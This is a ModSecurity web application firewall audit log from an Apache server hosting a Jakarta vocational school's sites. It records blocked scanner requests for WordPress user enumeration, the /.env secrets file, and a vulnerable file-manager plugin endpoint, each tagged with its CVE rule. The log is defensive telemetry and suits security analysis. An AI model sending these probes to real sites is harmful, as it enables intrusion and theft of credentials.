p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45f17111-Z-- --99dba41a-A-- [19/May/2025:02:12:27 +0700] aCoxG0PRqak7bVuUS6fF-AAAAII 103.236.140.4 40556 103.236.140.4 8181 --99dba41a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.239.52.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.239.52.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --99dba41a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99dba41a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747595547384688 3535 (- - -) Stopwatch2: 1747595547384688 3535; combined=1538, p1=555, p2=950, p3=0, p4=0, p5=32, sr=118, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99dba41a-Z-- --281a7667-A-- [19/May/2025:02:49:39 +0700] aCo50xir-GlPrFVVKe7aigAAAFU 103.236.140.4 40748 103.236.140.4 8181 --281a7667-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 105.27.160.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 105.27.160.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --281a7667-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --281a7667-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747597779274864 2933 (- - -) Stopwatch2: 1747597779274864 2933; combined=1281, p1=444, p2=805, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --281a7667-Z-- --5d913572-A-- [19/May/2025:03:08:35 +0700] aCo-Q0PRqak7bVuUS6fGngAAAI4 103.236.140.4 42902 103.236.140.4 8181 --5d913572-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.227.154.122 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.227.154.122 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5d913572-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d913572-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747598915750524 740 (- - -) Stopwatch2: 1747598915750524 740; combined=303, p1=263, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5d913572-Z-- --76ad541b-A-- [19/May/2025:03:30:49 +0700] aCpDeRir-GlPrFVVKe7hBAAAAEM 103.236.140.4 39874 103.236.140.4 8181 --76ad541b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 143.244.185.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.244.185.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --76ad541b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76ad541b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600249720739 2440 (- - -) Stopwatch2: 1747600249720739 2440; combined=1357, p1=445, p2=877, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76ad541b-Z-- --53dfbb7a-A-- [19/May/2025:03:32:28 +0700] aCpD3FewLfDrCkDGIGz8oAAAANY 103.236.140.4 45900 103.236.140.4 8181 --53dfbb7a-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 156624959 --53dfbb7a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --53dfbb7a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600348670922 2604 (- - -) Stopwatch2: 1747600348670922 2604; combined=1430, p1=375, p2=1028, p3=0, p4=0, p5=26, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53dfbb7a-Z-- --c420976b-A-- [19/May/2025:03:32:28 +0700] aCpD3FewLfDrCkDGIGz8owAAAMc 103.236.140.4 45910 103.236.140.4 8181 --c420976b-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 143.198.94.52 Accept-Encoding: gzip X-Varnish: 156386804 --c420976b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c420976b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600348835824 2795 (- - -) Stopwatch2: 1747600348835824 2795; combined=1350, p1=368, p2=960, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c420976b-Z-- --2caf3b14-A-- [19/May/2025:03:34:07 +0700] aCpEP_ypzAd0elWOk7ruNgAAAAM 103.236.140.4 52328 103.236.140.4 8181 --2caf3b14-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2caf3b14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2caf3b14-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||up.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600447205189 22114 (- - -) Stopwatch2: 1747600447205189 22114; combined=10989, p1=452, p2=10497, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2caf3b14-Z-- --fa403e29-A-- [19/May/2025:03:34:07 +0700] aCpEP1ewLfDrCkDGIGz-igAAAMc 103.236.140.4 52338 103.236.140.4 8181 --fa403e29-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --fa403e29-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa403e29-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||up.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747600447342102 2743 (- - -) Stopwatch2: 1747600447342102 2743; combined=1780, p1=456, p2=1292, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa403e29-Z-- --e2556174-A-- [19/May/2025:04:01:09 +0700] aCpKlWyGBQNQTJej4E57UQAAAJE 103.236.140.4 41798 103.236.140.4 8181 --e2556174-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --e2556174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e2556174-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747602069055985 945 (- - -) Stopwatch2: 1747602069055985 945; combined=416, p1=379, p2=0, p3=0, p4=0, p5=37, sr=159, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e2556174-Z-- --30e15515-A-- [19/May/2025:04:19:54 +0700] aCpO-myGBQNQTJej4E57pgAAAIM 103.236.140.4 42142 103.236.140.4 8181 --30e15515-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --30e15515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30e15515-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747603194472537 708 (- - -) Stopwatch2: 1747603194472537 708; combined=281, p1=243, p2=0, p3=0, p4=0, p5=37, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30e15515-Z-- --153dd475-A-- [19/May/2025:04:32:40 +0700] aCpR-GyGBQNQTJej4E58IQAAAJM 103.236.140.4 43226 103.236.140.4 8181 --153dd475-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 200.58.249.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 200.58.249.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --153dd475-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --153dd475-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747603960886337 3182 (- - -) Stopwatch2: 1747603960886337 3182; combined=1320, p1=434, p2=847, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --153dd475-Z-- --a9c05329-A-- [19/May/2025:04:42:49 +0700] aCpUWWyGBQNQTJej4E58LAAAAIY 103.236.140.4 43292 103.236.140.4 8181 --a9c05329-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.73.193.22 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.73.193.22 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9c05329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9c05329-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747604569436583 3168 (- - -) Stopwatch2: 1747604569436583 3168; combined=1412, p1=471, p2=908, p3=0, p4=0, p5=33, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9c05329-Z-- --02119742-A-- [19/May/2025:04:47:05 +0700] aCpVWTuVdcwZ_qZ5ZIoanQAAABA 103.236.140.4 43324 103.236.140.4 8181 --02119742-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.30.170 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.30.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --02119742-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02119742-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747604825814939 3341 (- - -) Stopwatch2: 1747604825814939 3341; combined=1456, p1=504, p2=920, p3=0, p4=0, p5=32, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02119742-Z-- --6c71f23a-A-- [19/May/2025:05:15:08 +0700] aCpb7GyGBQNQTJej4E58NgAAAIE 103.236.140.4 43504 103.236.140.4 8181 --6c71f23a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --6c71f23a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6c71f23a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747606508936535 826 (- - -) Stopwatch2: 1747606508936535 826; combined=325, p1=285, p2=0, p3=0, p4=0, p5=40, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6c71f23a-Z-- --df49b371-A-- [19/May/2025:05:19:22 +0700] aCpc6r8BMImlI6dyVePKrAAAAMc 103.236.140.4 43526 103.236.140.4 8181 --df49b371-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 206.189.18.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --df49b371-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df49b371-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747606762791218 3485 (- - -) Stopwatch2: 1747606762791218 3485; combined=1508, p1=527, p2=949, p3=0, p4=0, p5=32, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df49b371-Z-- --e088d434-A-- [19/May/2025:05:19:27 +0700] aCpc7wZaP57SewDBUi85AQAAAFE 103.236.140.4 43528 103.236.140.4 8181 --e088d434-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 131.161.125.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 131.161.125.26 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e088d434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e088d434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747606767920163 2965 (- - -) Stopwatch2: 1747606767920163 2965; combined=1263, p1=437, p2=796, p3=0, p4=0, p5=30, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e088d434-Z-- --c00b4015-A-- [19/May/2025:05:35:11 +0700] aCpgn78BMImlI6dyVePKsQAAAM0 103.236.140.4 43612 103.236.140.4 8181 --c00b4015-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 123.25.241.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 123.25.241.39 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c00b4015-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c00b4015-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 